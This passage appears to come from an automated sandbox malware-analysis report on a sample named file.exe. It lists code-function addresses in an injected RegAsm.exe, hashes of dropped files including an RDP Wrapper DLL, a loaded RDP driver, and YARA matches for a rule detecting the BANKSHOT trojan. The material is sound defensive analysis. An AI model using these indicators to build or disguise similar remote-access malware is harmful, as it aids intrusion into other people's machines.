Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C2C9E50	4_2_6C2C9E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C2E3E50	4_2_6C2E3E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C304EA0	4_2_6C304EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C30E680	4_2_6C30E680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C2C5E90	4_2_6C2C5E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C3176E3	4_2_6C3176E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C2ABEF0	4_2_6C2ABEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C2BFEF0	4_2_6C2BFEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C2B9F00	4_2_6C2B9F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C2E7710	4_2_6C2E7710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C2F77A0	4_2_6C2F77A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C2ADFE0	4_2_6C2ADFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C2D6FF0	4_2_6C2D6FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C2EB820	4_2_6C2EB820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C2F4820	4_2_6C2F4820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C2B7810	4_2_6C2B7810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C2EF070	4_2_6C2EF070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C2C8850	4_2_6C2C8850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C2CD850	4_2_6C2CD850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C2D60A0	4_2_6C2D60A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C2CC0E0	4_2_6C2CC0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C2E58E0	4_2_6C2E58E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C3150C7	4_2_6C3150C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C31B170	4_2_6C31B170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C2BD960	4_2_6C2BD960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C2FB970	4_2_6C2FB970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C2CA940	4_2_6C2CA940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C2AC9A0	4_2_6C2AC9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C2DD9B0	4_2_6C2DD9B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C302990	4_2_6C302990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C2E5190	4_2_6C2E5190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C2E9A60	4_2_6C2E9A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C312AB0	4_2_6C312AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C2A22A0	4_2_6C2A22A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C2D4AA0	4_2_6C2D4AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C2BCAB0	4_2_6C2BCAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C31BA90	4_2_6C31BA90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C2C1AF0	4_2_6C2C1AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C2EE2F0	4_2_6C2EE2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C2E8AC0	4_2_6C2E8AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C2ED320	4_2_6C2ED320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C2BC370	4_2_6C2BC370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C2A5340	4_2_6C2A5340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C2AF380	4_2_6C2AF380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C3153C8	4_2_6C3153C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C416C00	4_2_6C416C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C35AC60	4_2_6C35AC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C42AC30	4_2_6C42AC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C3AECD0	4_2_6C3AECD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C34ECC0	4_2_6C34ECC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C47AD50	4_2_6C47AD50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C41ED70	4_2_6C41ED70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C4D8D20	4_2_6C4D8D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C354DB0	4_2_6C354DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C4DCDC0	4_2_6C4DCDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C3E6D90	4_2_6C3E6D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C3EEE70	4_2_6C3EEE70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C430E20	4_2_6C430E20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C3D6E90	4_2_6C3D6E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C35AEC0	4_2_6C35AEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C3F0EC0	4_2_6C3F0EC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C356F10	4_2_6C356F10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C412F70	4_2_6C412F70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C490F20	4_2_6C490F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C3BEF40	4_2_6C3BEF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C35EFB0	4_2_6C35EFB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C42EFF0	4_2_6C42EFF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C350FE0	4_2_6C350FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C498FB0	4_2_6C498FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C424840	4_2_6C424840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C3A0820	4_2_6C3A0820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C3DA820	4_2_6C3DA820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C4568E0	4_2_6C4568E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C3A6900	4_2_6C3A6900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C388960	4_2_6C388960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C3E09A0	4_2_6C3E09A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C46C9E0	4_2_6C46C9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C3849F0	4_2_6C3849F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C40A9A0	4_2_6C40A9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C4109B0	4_2_6C4109B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C3FEA00	4_2_6C3FEA00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C3CCA70	4_2_6C3CCA70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C408A30	4_2_6C408A30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C3CEA80	4_2_6C3CEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C3F0BA0	4_2_6C3F0BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C456BE0	4_2_6C456BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C3DA430	4_2_6C3DA430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C3B4420	4_2_6C3B4420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C368460	4_2_6C368460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C47A480	4_2_6C47A480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C3964D0	4_2_6C3964D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C3EA4D0	4_2_6C3EA4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C454540	4_2_6C454540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C498550	4_2_6C498550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C3F0570	4_2_6C3F0570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C3B2560	4_2_6C3B2560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C3A8540	4_2_6C3A8540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C3445B0	4_2_6C3445B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C41A5E0	4_2_6C41A5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C3DE5F0	4_2_6C3DE5F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C3AC650	4_2_6C3AC650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C3AE6E0	4_2_6C3AE6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_6C3EE6E0	4_2_6C3EE6E0
Source: C:\Users\userAFHDHCAAKE.exe	Code function: 7_2_02760C40	7_2_02760C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0041C472	10_2_0041C472
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0042D933	10_2_0042D933
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0042D1C3	10_2_0042D1C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0042D561	10_2_0042D561
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0041950A	10_2_0041950A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0042DD1B	10_2_0042DD1B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0042CD2E	10_2_0042CD2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0041B712	10_2_0041B712
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1FFE4CF0	10_2_1FFE4CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1FFD209F	10_2_1FFD209F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_2005A0B0	10_2_2005A0B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1FFD47AF	10_2_1FFD47AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_200CA590	10_2_200CA590
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_2010E800	10_2_2010E800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1FFD3E3B	10_2_1FFD3E3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1FFD481D	10_2_1FFD481D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_200EA900	10_2_200EA900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_200CA940	10_2_200CA940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_200B69C0	10_2_200B69C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1FFDD4C0	10_2_1FFDD4C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1FFD19DD	10_2_1FFD19DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_20016E80	10_2_20016E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_201AAEBE	10_2_201AAEBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_20032EE0	10_2_20032EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1FFE9000	10_2_1FFE9000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1FFD174E	10_2_1FFD174E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1FFF8D2A	10_2_1FFF8D2A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_20003370	10_2_20003370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1FFDC800	10_2_1FFDC800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_20007810	10_2_20007810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1FFF8763	10_2_1FFF8763
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1FFF8680	10_2_1FFF8680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1FFD251D	10_2_1FFD251D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1FFD290A	10_2_1FFD290A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_200F8030	10_2_200F8030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_20050090	10_2_20050090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_20058120	10_2_20058120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1FFD3AB2	10_2_1FFD3AB2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_20110480	10_2_20110480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1FFFBAB0	10_2_1FFFBAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_20034760	10_2_20034760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_20068760	10_2_20068760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1FFD1EF1	10_2_1FFD1EF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_200D4A60	10_2_200D4A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_2000CE10	10_2_2000CE10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1FFDF160	10_2_1FFDF160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_200F5040	10_2_200F5040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_201AD209	10_2_201AD209
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1FFD3580	10_2_1FFD3580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_200653B0	10_2_200653B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_20139430	10_2_20139430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1FFDEA80	10_2_1FFDEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1FFDAA40	10_2_1FFDAA40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_20079690	10_2_20079690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_2008D6D0	10_2_2008D6D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1FFD1C9E	10_2_1FFD1C9E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1FFE66C0	10_2_1FFE66C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_20085940	10_2_20085940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_200F9A20	10_2_200F9A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1FFD2018	10_2_1FFD2018
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1FFFA560	10_2_1FFFA560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_20001C50	10_2_20001C50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1FFD292D	10_2_1FFD292D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_20139CC0	10_2_20139CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1FFD2AA9	10_2_1FFD2AA9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1FFD12A8	10_2_1FFD12A8

Source: Joe Sandbox View	Dropped File: C:\Program Files\RDP Wrapper\rdpwrap.dll 798AF20DB39280F90A1D35F2AC2C1D62124D1F5218A2A0FA29D87A13340BD3E4
Source: Joe Sandbox View	Dropped File: C:\ProgramData\BKFHCGIDBA.exe 63D86693917598DF88D518C057C7680B5BD2DE9ADD384425F81EAD95EEE18DBA

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 004047E8 appears 38 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6C2E94D0 appears 90 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 1FFD1C2B appears 46 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00410609 appears 71 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6C2DCBE8 appears 134 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6C4D09D0 appears 149 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 004045C0 appears 317 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 1FFD415B appears 173 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 201B06B1 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6C373620 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6C4DDAE0 appears 39 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6C4DD930 appears 31 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 004104E7 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 1FFD1F5A appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6C379B10 appears 34 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 1FFD3AF3 appears 37 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 1FFD395E appears 81 times

Source: file.exe

Static PE information: invalid certificate

Source: file.exe, 00000000.00000002.2068414325.0000000000D5E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs file.exe
Source: file.exe, 00000000.00000000.2064199667.0000000000782000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameVQP.exeD vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenameVQP.exeD vs file.exe

Source: unknown

Driver loaded: C:\Windows\System32\drivers\rdpvideominiport.sys

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 10.2.RegAsm.exe.43dcd8.2.raw.unpack, type: UNPACKEDPE	Matched rule: HiddenCobra_BANKSHOT_Gen date = 2017-12-26, hash5 = ef6f8b43caa25c5f9c7749e52c8ab61e8aec8053b9f073edeca4b35312a0a699, hash4 = daf5facbd67f949981f8388a6ca38828de2300cb702ad530e005430782802b75, hash3 = b766ee0f46c92a746f6db3773735ee245f36c1849de985bbc3a37b15f7187f24, hash2 = 8b2d084a8bb165b236d3e5436d6cb6fa1fda6431f99c4f34973dc735b4f2d247, hash1 = 89775a2fbb361d6507de6810d2ca71711d5103b113179f1e1411ccf75e6fc486, author = Florian Roth, description = Detects Hidden Cobra BANKSHOT trojan, hash9 = 6db37a52517653afe608fd84cc57a2d12c4598c36f521f503fd8413cbef9adca, hash8 = 3e6d575b327a1474f4767803f94799140e16a729e7d00f1bea40cd6174d8a8a6, hash7 = ec44ecd57401b3c78d849115f08ff046011b6eb933898203b7641942d4ee3af9, hash6 = d900ee8a499e288a11f1c75e151569b518864e14c58cc72c47f95309956b3eff, reference = https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.RegAsm.exe.43f8e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: HiddenCobra_BANKSHOT_Gen date = 2017-12-26, hash5 = ef6f8b43caa25c5f9c7749e52c8ab61e8aec8053b9f073edeca4b35312a0a699, hash4 = daf5facbd67f949981f8388a6ca38828de2300cb702ad530e005430782802b75, hash3 = b766ee0f46c92a746f6db3773735ee245f36c1849de985bbc3a37b15f7187f24, hash2 = 8b2d084a8bb165b236d3e5436d6cb6fa1fda6431f99c4f34973dc735b4f2d247, hash1 = 89775a2fbb361d6507de6810d2ca71711d5103b113179f1e1411ccf75e6fc486, author = Florian Roth, description = Detects Hidden Cobra BANKSHOT trojan, hash9 = 6db37a52517653afe608fd84cc57a2d12c4598c36f521f503fd8413cbef9adca, hash8 = 3e6d575b327a1474f4767803f94799140e16a729e7d00f1bea40cd6174d8a8a6, hash7 = ec44ecd57401b3c78d849115f08ff046011b6eb933898203b7641942d4ee3af9, hash6 = d900ee8a499e288a11f1c75e151569b518864e14c58cc72c47f95309956b3eff, reference = https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: HiddenCobra_BANKSHOT_Gen date = 2017-12-26, hash5 = ef6f8b43caa25c5f9c7749e52c8ab61e8aec8053b9f073edeca4b35312a0a699, hash4 = daf5facbd67f949981f8388a6ca38828de2300cb702ad530e005430782802b75, hash3 = b766ee0f46c92a746f6db3773735ee245f36c1849de985bbc3a37b15f7187f24, hash2 = 8b2d084a8bb165b236d3e5436d6cb6fa1fda6431f99c4f34973dc735b4f2d247, hash1 = 89775a2fbb361d6507de6810d2ca71711d5103b113179f1e1411ccf75e6fc486, author = Florian Roth, description = Detects Hidden Cobra BANKSHOT trojan, hash9 = 6db37a52517653afe608fd84cc57a2d12c4598c36f521f503fd8413cbef9adca, hash8 = 3e6d575b327a1474f4767803f94799140e16a729e7d00f1bea40cd6174d8a8a6, hash7 = ec44ecd57401b3c78d849115f08ff046011b6eb933898203b7641942d4ee3af9, hash6 = d900ee8a499e288a11f1c75e151569b518864e14c58cc72c47f95309956b3eff, reference = https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity, license = https://creativecommons.org/licenses/by-nc/4.0/
